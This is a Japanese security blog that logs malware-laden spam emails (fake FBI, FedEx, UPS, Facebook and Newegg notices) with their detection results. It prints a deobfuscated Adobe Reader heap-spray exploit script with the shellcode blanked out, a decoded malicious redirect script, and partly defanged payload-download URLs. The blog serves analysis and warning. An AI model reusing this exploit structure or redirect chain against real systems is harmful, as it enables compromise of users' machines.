【FBIからの警告】すいません

やば!

あのFBIから警告が来てしまった。俺は何をやらかしたんだろう。この間の○○○か、先日の××だろうか?

差出人:"FBI" <info49429@fbi.gov>

表題:You visit illegal websites

本文:
Sir/Madam,we have logged your IP-address on more than 40 illegal Websites Important: Please answer our questions!The list of questions are attached. as rq zr

要は、我々FBIお前の不審なアクセスを記録した。添付の質問に直ちに答えよ。とある。

あーーーー、めちゃヤバだ。

続きを読む

【今日のウイルスメール】おー久しぶり!復活か?

久々だなぁ。

件名
FedEx notification #09511

本文
Dear customer.The parcel was sent your home address.And it will arrive within 7 business day.More information and the tracking number are attached in document below.Thank you.© FedEx 1995-2011QN3LZCI1093EQB3F246P3AI14PNMHAR

添付ファイル
Document.zip

File name:Document.zip
Submission date:2011-03-16 14:01:04 (UTC)
Current status:finished
Result:14 /43 (32.6%)

続きを読む

【今日のウイルスメール】久々に

件名
2nd attempt at Delivery

本文
Hi,
We attempted to deliver your order today but we are having problem with your delivery address.Please check the attached invoice in pdf in order to reconfirm your delivery address
Regards,
UPS Customer Service

添付ファイル
invoice.pdf

MD5: 09b6fe36cec138e0aa90a358c7c79eb4
Date first seen: 2010-12-10 08:10:49 (UTC)
Date last seen: 2010-12-10 08:10:49 (UTC)
Detection ratio: 15/43
ウイルスチェック結果
Antivirus Version Last update Result
AhnLab-V3 2010.12.10.00 2010.12.09 -
AntiVir 7.10.14.244 2010.12.09 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.12.10 -
Avast 4.8.1351.0 2010.12.10 JS:Pdfka-gen
Avast5 5.0.677.0 2010.12.10 JS:Pdfka-gen
AVG 9.0.0.851 2010.12.10 -
BitDefender 7.2 2010.12.10 -
CAT-QuickHeal 11.00 2010.12.10 -
ClamAV 0.96.4.0 2010.12.10 PUA.PDF.RunJS
Command 5.2.11.5 2010.12.10 PDF/Obfusc.F!Camelot
Comodo 7010 2010.12.10 -
DrWeb 5.0.2.03300 2010.12.10 -
Emsisoft 5.1.0.1 2010.12.10 -
eSafe 7.0.17.0 2010.12.09 PDF.Exploit.1
eTrust-Vet 36.1.8032 2010.12.10 PDF/Pidief!generic
F-Prot 4.6.2.117 2010.12.09 -
F-Secure 9.0.16160.0 2010.12.10 -
Fortinet 4.2.254.0 2010.12.09 -
GData 21 2010.12.10 JS:Pdfka-gen
Ikarus T3.1.1.90.0 2010.12.10 -
Jiangmin 13.0.900 2010.12.10 -
K7AntiVirus 9.71.3200 2010.12.09 -
Kaspersky 7.0.0.125 2010.12.10 -
McAfee 5.400.0.1158 2010.12.10 Exploit-PDF.q.gen
McAfee-GW-Edition 2010.1C 2010.12.09 Exploit-PDF.q.gen
Microsoft 1.6402 2010.12.10 Exploit:Win32/Pdfjsc.G
NOD32 5690 2010.12.10 PDF/Exploit.Pidief.OJS.Gen
Norman 6.06.12 2010.12.10 -
nProtect 2010-12-10.01 2010.12.10 -
Panda 10.0.2.7 2010.12.09 Exploit/PDF.Gen.B
PCTools 7.0.3.5 2010.12.10 -
Prevx 3.0 2010.12.10 -
Rising 22.77.03.06 2010.12.10 -
Sophos 4.60.0 2010.12.10 Sus/PDFJs-Q
SUPERAntiSpyware 4.40.0.1006 2010.12.10 -
Symantec 20101.3.0.103 2010.12.10 -
TheHacker 6.7.0.1.097 2010.12.09 -
TrendMicro 9.120.0.1004 2010.12.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.12.10 -
VBA32 3.12.14.2 2010.12.09 -
VIPRE 7585 2010.12.10 Exploit.PDF-JS.Gen (v)
ViRobot 2010.12.10.4193 2010.12.10 -
VirusBuster 13.6.84.1 2010.12.09 -
MD5: 09b6fe36cec138e0aa90a358c7c79eb4
SHA1: 09ece8e33025c89b9e77fb94abf3c33efaaf6b50
SHA256: c9ae3e21b1d1c5e40dae4f19c3e114467720e8f954e6150370cb713aca338397
File size: 11582 bytes
Scan date: 2010-12-10 08:10:49 (UTC)


で、PDFに埋め込まれているJAVAスクリプトは難読化されている。解いてみると大体以下のような感じ、バージョン調べてそれに合わせて実行している。

function x35C2M(){
function fix_it(yarsp, len){
while (yarsp.length * 2 < len){
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len/2);
return yarsp;
}

function util_printf(){
var payload = unescape("hogehoge");
var nop = unescape("")
var heapblock = nop + payload;
var bigblock = unescape("");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray){
bigblock += bigblock;
}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length-spray);
while (block.length+spray < 0x40000){
block = block + block + fillblock;
}
var mem_array = new Array();
for (var i = 0; i < 1400; i++){
mem_array[i] = block + heapblock;
}
var num =
12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("E000f", num);
}

function collab_email(){
var shellcode = unescape("hogehoge");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count = 0; count < count2; count++){
mem_array[count] = yarsp + shellcode;
}
var overflow = unescape("hogehoge");
while (overflow.length < 44952){
overflow += overflow;
}
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}

function collab_geticon(){
if (app.doc.Collab.getIcon){
var arry = new Array();
var vvpethya = unescape("hogehoge");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + vvpethya;
}
var tUMhNbGw = unescape(" ");
while (tUMhNbGw.length < 0x4000){
tUMhNbGw += tUMhNbGw;
}
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}

function newplayer(){
var SH = unescape("hogehoge");
var oDQvB = unescape("hogehoge");
var rffMwoiLDYsFNdKcPazkQfo = unescape("hogehoge");
while(oDQvB.length <= 32768) oDQvB+=oDQvB;
oDQvB=oDQvB.substring(0,32768 - SH.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= oDQvB + SH;}
util.printd("hogehoge", new Date());
util.printd("hogehoge", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(rffMwoiLDYsFNdKcPazkQfo, new Date());
}

function pdf_start(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
collab_email();
}

if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
collab_geticon();
}

if((ver_array[0]==8&&ver_array[1]<2)|| (ver_array[0]==9&&ver_array[1]<3)){
newplayer();
}
}

【今日の難読スクリプト】続編 LZHのゼロデイ?

件名
I've attached...I'm enclosing... the latest figures for you.

本文
I have attached the resume.

添付ファイル
77330resume.html

内容 はさっきの奴と一緒
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。(A)

誘導スクリプト → 中継点(A)→配布先

つまり、上記ような構造となっており、誘導スクリプトは姿を変えウイルス対策ソフトをかいくぐる、が誘導先(A)はそんなに変化しない。
ちなみに、このAのルート http://thfriisjensen.dk/ はこういうサイトだ。
thfriisjensendk.jpg

置き場にされているのだろう。で、今回は以下の内容だった。
h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきとは異なる。
さっき→h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param
今回→→h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post

さっきと違うことが分かります。ここにアクセスすると以下のものが落ちてきた。

h丁丁p://hojikyp.co.cc/news/exe.php?x=jar5 → lzhファイル
h丁丁p://hojikyp.co.cc/news/exe.php?x=jjar → lzhファイル →チェック結果
上記二つは同一ファイル。LZHの修復不可能な脆弱性を突くやつだろうか?もしそうだと目茶目茶やばいな。
MD5: 28f2ee30b443160f76166bd15287bb02
Date first seen: 2010-09-22 18:44:54 (UTC)
Date last seen: 2010-09-22 18:44:54 (UTC)
Detection ratio: 4/43

検体を、ジェペットおじさんとピノキオさんら、クジラの中の人に送ってコメントをもらおう。

21:21 追記
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。


もしこれが、LZHのゼロデイならば作者は、使用をやめてくれと言っているが、それではだめだ。
LZH系のアプリやDLLをアンインストールしないといけない。

勝手にダウンロードされてしまうからだ。

h丁丁p://hojikyp.co.cc/news/j.php → javaプログラム →チェック結果
MD5: 84f5defe4328d0c31cafb136a3cc5a89
Date first seen: 2010-09-13 10:41:25 (UTC)
Date last seen: 2010-09-23 02:03:33 (UTC)
Detection ratio: 8/42

h丁丁p://hojikyp.co.cc/news/jar5.php → javaプログラム →チェック結果
MD5: 4eea7ae357eecaa94c084083dd4e56da
Date first seen: 2010-09-14 08:04:12 (UTC)
Date last seen: 2010-09-23 08:27:00 (UTC)
Detection ratio: 11/43

h丁丁p://hojikyp.co.cc/news/js.php → javaスクリプト →チェック結果
MD5: b74b43a2fe25a8b253a4310ee827ae77
Date first seen: 2010-05-28 12:53:42 (UTC)
Date last seen: 2010-09-23 08:54:44 (UTC)
Detection ratio: 3/43

続きを読む

【今日のウイルスメール】またFacebook系

差出人
"Facebook Team" <assistant@facebook.com>

件名
Facebook password has been changed

本文
Dear user of facebook.

Because of the measures taken to provide safety to our clients, your password has been changed.

Important Message!
You can find your new password in attached document.

Thank you.
Facebook Team.

添付ファイル
dikens.jpg

MD5: 843d5efc64e2338206f3736a2a876c45
Date first seen: 2010-09-16 13:51:39 (UTC)
Date last seen: 2010-09-16 17:35:07 (UTC)
Detection ratio: 9/43
ウイルスチェック結果

続きを読む

【今日のウイルスメール】

件名
Shipping Notification

本文
Shipping NotificationThank you for shopping with us. We look forward to serving you again.

The following is your receipt. Please retain a copy for your records.

Qty Item no Description Price S&H Tax Return
Code
1 FC864-2038B MsgDrma7303 White 650.99 6.95 3.37 ____

Merchandise total 650.99
Shipping andhandling 6.95
Tax on mdse 6.75% 3.37
Invoice total 706.31

Welcome to the convenience of shopping JCPenney Catalog

添付ファイル
Shipping Notification.zip

MD5: 2da000cf95385ea53c14cfc5184f2aec
Date first seen: 2010-09-15 20:41:21 (UTC)
Date last seen: 2010-09-15 22:41:09 (UTC)
Detection ratio: 4/43
ウイルスチェック結果

続きを読む

【今日のウイルスメール】Facebook系

jpeg拡張子で中身はexeか。

件名
Your facebook password has been changed

本文
Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
Your Facebook.

添付ファイル
holman.jpg

MD5: 67326d11b7bcd9766f4a9ba636740305
Date first seen: 2010-09-14 16:10:52 (UTC)
Date last seen: 2010-09-14 22:10:55 (UTC)
Detection ratio: 15/43
ウイルスチェック結果

続きを読む

【今日のウイルスメール】

件名
Evite invitation from Kristopher Weaver

本文
You have been invited by Kristopher Weaver to "Housewarming Party!"

Hi everyone, Please view my invitation and let me know if you can attend. Thanks!

Attached please find

This invitation was sent to you by Kristopher Weaver using Evite.

This Evite Invite is covered by Evite's privacy policy*.

To view this privacy policy, please find attached.

添付ファイル
Housewarming Party!.zip

MD5: 76db09a9288bbcdaab6549bccc5da959
Date first seen: 2010-09-14 13:39:02 (UTC)
Date last seen: 2010-09-14 15:23:05 (UTC)
Detection ratio: 8/43
ウイルスチェック結果

続きを読む

【今日のウイルスメール】

件名
Birth Certificates

本文
Hi Honey,
Here are both boys birth certificates.
Love you & miss you bunches
--
Have A Great Day!!

添付ファイル
Riley Birth Certificate.zip

MD5: ffe6e6f1b678d81c6c794c64e7e753ca
Date first seen: 2010-09-14 13:42:38 (UTC)
Date last seen: 2010-09-14 14:04:33 (UTC)
Detection ratio: 6/43
ウイルスチェック結果

続きを読む

【今日の誘導メール】前門の虎後門の狼系

件名
Newegg.com - Payment Charged

本文
Newegg.com - Payment Charged
Customer ID: 353455
AccountNumber: 47346765765
Hello,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 134564535)has been successfully charged to your VISA and orderverification is now complete.
Please find attached invoice.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
Newegg.com,9997 E. Rose Hills Road, Whittier, CA. 90601 | 2000-2010 Newegg Inc.All rights reserved.

添付ファイル
NewEgg Invoice.html 含まれるスクリプト部分

function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;<
誘導先 → h丁丁p://tracebook.us/1.html
メタタグ → h丁丁p://cetogilco.cz.cc/scanner10/?afid=24
aguse.jpで調べてみると、今日は生きてない。そういうことか!。
czcc.jpg

iframeタグ → http://windows-portal.in/3/index.php?message=151&on=back&navig=ddd&pool=ssl
こちらの方は、
h丁丁p://windows-portal.in/home/j.php が落ちてきて

MD5: f6c79355101b4c382d2bb3e12e7b4fe2
Date first seen: 2010-06-17 17:50:15 (UTC)
Date last seen: 2010-08-24 12:36:27 (UTC)
Detection ratio: 16/42
ウイルスチェック結果

続きを読む

【今日のウイルスメール】

件名と本文、合ってないし。もう少しまじめにやれ!(笑)

件名
Brad Pitt Fatal Car Crash

本文
Tiger Woods was killed in an automobile accident near Sens, France.

Please find attach

添付ファイル
CNN Hot News.zip

MD5: 3fbe5d10a47dbd871b4b299b4c05107e
Date first seen: 2010-08-23 17:12:41 (UTC)
Date last seen: 2010-08-23 23:13:27 (UTC)
Detection ratio: 12/42
ウイルスチェック結果

続きを読む

【今日のウイルスメール】

件名
Application
本文
Hi ,

Thank you for your interest! Please fill out the attached application.

添付ファイル
application.zip

MD5: 6834ca01e16e09139ab9a428dc1a296a
Date first seen: 2010-08-21 23:28:43 (UTC)
Date last seen: 2010-08-22 01:52:32 (UTC)
Detection ratio: 20/42
ウイルスチェック結果

続きを読む

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り